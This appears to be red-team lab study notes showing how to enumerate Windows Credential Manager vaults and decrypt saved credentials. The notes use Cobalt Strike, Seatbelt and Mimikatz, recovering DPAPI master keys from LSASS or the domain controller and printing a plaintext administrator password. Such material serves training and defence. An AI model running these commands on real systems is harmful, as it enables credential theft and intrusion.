Secondary Categories: 02 - Cryptography, 02 - Privilege Escalation
Links: Dumping Credentials, Data Protection API (DPAPI)
Credential Manager
Description:
There are two concepts:
- Vaults : Hold records of the stored credentials and a reference to each encrypted blob
- Credentials : The encrypted blob itself
Cobalt Strike
To enumerate the user's vaults:
beacon> run vaultcmd /list
Currently loaded vaults:
Vault: Web Credentials
Vault Guid:4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Location: C:\Users\bfarmer\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Vault: Windows Credentials
Vault Guid:77BC582B-F0A6-4E15-4E80-61736B6F3B29
Location: C:\Users\bfarmer\AppData\Local\Microsoft\Vault
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
Credentials in vault: Windows Credentials
Credential schema: Windows Domain Password Credential
Resource: Domain:target=TERMSRV/sql-2.dev.cyberbotic.io
Identity: SQL-2\Administrator
Hidden: No
Roaming: No
Property (schema element id,value): (100,2)
Seatbelt
Another option is to run Seatbelt; in Cobalt Strike you can do this with execute-assembly:
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault
====== WindowsVault ======
Vault GUID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Vault Type : Web Credentials
Item count : 0
Vault GUID : 77bc582b-f0a6-4e15-4e80-61736b6f3b29
Vault Type : Windows Credentials
Item count : 1
SchemaGuid : 3e0e35be-1b77-43e7-b873-aed901b6275b
Resource : String: Domain:target=TERMSRV/sql-2.dev.cyberbotic.io
Identity : String: SQL-2\Administrator
PackageSid : (null)
Credential :
LastModified : 9/6/2022 9:12:12 AM
Based on the results above we know that the user has saved credentials for SQL-2. The encrypted credential blobs themselves are stored here:
beacon> ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials
[*] Listing: C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\
Size Type Last Modified Name
---- ---- ------------- ----
468b fil 09/06/2022 10:34:22 6C33AC85D0C4DCEAB186B3B2E5B1AC7C
10kb fil 08/30/2022 08:42:59 DFBE70A7E5CC19A398EBF1B96859CE5D
You can also do this with Seatbelt:
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles
====== WindowsCredentialFiles ======
Folder : C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\
FileName : 6C33AC85D0C4DCEAB186B3B2E5B1AC7C
Description : Local Credential Data
MasterKey : bfc5090d-22fe-4058-8953-47f6882f549e
Accessed : 9/6/2022 10:50:44 AM
Modified : 9/6/2022 10:50:44 AM
Size : 468
FileName : DFBE70A7E5CC19A398EBF1B96859CE5D
Description : Local Credential Data
MasterKey : bfc5090d-22fe-4058-8953-47f6882f549e
Accessed : 9/6/2022 10:50:44 AM
Modified : 9/6/2022 10:50:44 AM
Size : 11036
Seatbelt also reports the GUID of the master key used to encrypt each credential. The master keys are stored in the user's roaming "Protect" directory, but they are also encrypted.
beacon> ls C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104
[*] Listing: C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\
Size Type Last Modified Name
---- ---- ------------- ----
740b fil 08/15/2022 17:34:31 bfc5090d-22fe-4058-8953-47f6882f549e
928b fil 08/15/2022 17:34:31 BK-DEV
24b fil 08/15/2022 17:34:31 Preferred
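As an added illustration (not code from these notes or from Seatbelt), the parser below walks the DPAPI_BLOB header at the start of a Credentials\ file and reports the same metadata Seatbelt prints: the master-key GUID the file depends on, its description, and the cipher and hash algorithms. It assumes a 12-byte credential-file header precedes the blob and builds its own constructed sample input; nothing is decrypted, which makes it usable for triage of which master key a given file references.

```python
import struct
import uuid

DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")  # fixed GUID that opens every DPAPI blob
ALG = {0x6603: "3DES", 0x660E: "AES-128", 0x6610: "AES-256", 0x8004: "SHA1", 0x800E: "SHA-512"}  # CryptoAPI ALG_IDs
CRED_FILE_HEADER = 12  # bytes preceding the DPAPI blob in a Credentials\ file (assumption, see lead-in)

def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4

def _lv(buf, off):  # DWORD length followed by that many bytes
    n, off = _u32(buf, off)
    return buf[off:off + n], off + n

def parse_dpapi_blob(blob: bytes) -> dict:
    """Walk the DPAPI_BLOB header and report its metadata; nothing is decrypted."""
    version, off = _u32(blob, 0)
    provider, off = uuid.UUID(bytes_le=blob[off:off + 16]), off + 16
    if version != 1 or provider != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob")
    _mk_version, off = _u32(blob, off)
    master_key, off = uuid.UUID(bytes_le=blob[off:off + 16]), off + 16  # the GUID Seatbelt reports
    _flags, off = _u32(blob, off)
    desc, off = _lv(blob, off)  # UTF-16LE description such as "Local Credential Data"
    alg_crypt, crypt_bits = struct.unpack_from("<II", blob, off); off += 8
    salt, off = _lv(blob, off)
    _hmac_key, off = _lv(blob, off)
    alg_hash, hash_bits = struct.unpack_from("<II", blob, off); off += 8
    _hmac2, off = _lv(blob, off)
    data, off = _lv(blob, off)  # ciphertext; only the referenced master key can decrypt it
    sig, off = _lv(blob, off)   # HMAC over the blob
    return {"master_key": str(master_key), "description": desc.decode("utf-16-le").rstrip("\0"),
            "cipher": f"{ALG.get(alg_crypt, hex(alg_crypt))}/{crypt_bits}",
            "hash": f"{ALG.get(alg_hash, hex(alg_hash))}/{hash_bits}",
            "salt_len": len(salt), "data_len": len(data), "sig_len": len(sig)}

def parse_credential_file(raw: bytes) -> dict:
    return parse_dpapi_blob(raw[CRED_FILE_HEADER:])

def build_sample(master_key: str, description: str = "Local Credential Data") -> bytes:
    """Constructed test input: a structurally valid credential file holding dummy ciphertext."""
    lv = lambda b: struct.pack("<I", len(b)) + b
    body = (struct.pack("<I", 1) + DPAPI_PROVIDER.bytes_le + struct.pack("<I", 1)
            + uuid.UUID(master_key).bytes_le + struct.pack("<I", 0)
            + lv((description + "\0").encode("utf-16-le"))
            + struct.pack("<II", 0x6610, 256) + lv(b"\x11" * 32) + lv(b"")
            + struct.pack("<II", 0x800E, 512) + lv(b"") + lv(b"\x22" * 48) + lv(b"\x33" * 64))
    return b"\0" * CRED_FILE_HEADER + body
```

Run it against a real file with `parse_credential_file(open(path, "rb").read())`; the reported master_key should match the file name in the user's Protect directory that Seatbelt lists.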
We must first decrypt the master key to obtain the AES-128/256 encryption key, then use that key to decrypt the credential blob. There are two ways to do this...
Option 1
If you have local admin access on the machine, the key is cached in LSASS. It will not be in the cache, however, if the user has not recently accessed (decrypted) the credential.
beacon> mimikatz !sekurlsa::dpapi
Authentication Id : 0 ; 1075454 (00000000:001068fe)
Session : RemoteInteractive from 2
User Name : bfarmer
Domain : DEV
Logon Server : DC-2
Logon Time : 9/6/2022 9:09:54 AM
SID : S-1-5-21-569305411-121244042-2357301523-1104
[00000000]
* GUID : {bfc5090d-22fe-4058-8953-47f6882f549e}
* Time : 9/6/2022 11:27:44 AM
* MasterKey : 8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
* sha1(key) : 897f7bf129e6a898ff4e20e9789009d5385be1f3
We can see that the GUID matches what we are looking for, so the key is:
8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
Option 2
Another way to get the master key, which does not require elevation or interaction with LSASS, is to request it from the domain controller via the Microsoft BackupKey Remote Protocol (MS-BKRP). This is a failsafe mechanism for cases where a user changes or forgets their password, and it also supports various smart card functionality.
beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc
[domainkey] with RPC
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
key : 8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
sha1: 897f7bf129e6a898ff4e20e9789009d5385be1f3
This will only work if executed in the context of the user whose key we need to retrieve.
Decrypting DPAPI
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214
TargetName : Domain:target=TERMSRV/sql-2.dev.cyberbotic.io
UserName : SQL-2\Administrator
CredentialBlob : wIfY&cZ&d?QP9iMFEzckmj.34=@sg.*i
Resources:
| Title | URL |
|---|---|
| Seatbelt | https://github.com/GhostPack/Seatbelt |
Created Date: November 19th 2022 10:26
Last Modified Date: November 19th 2022 10:26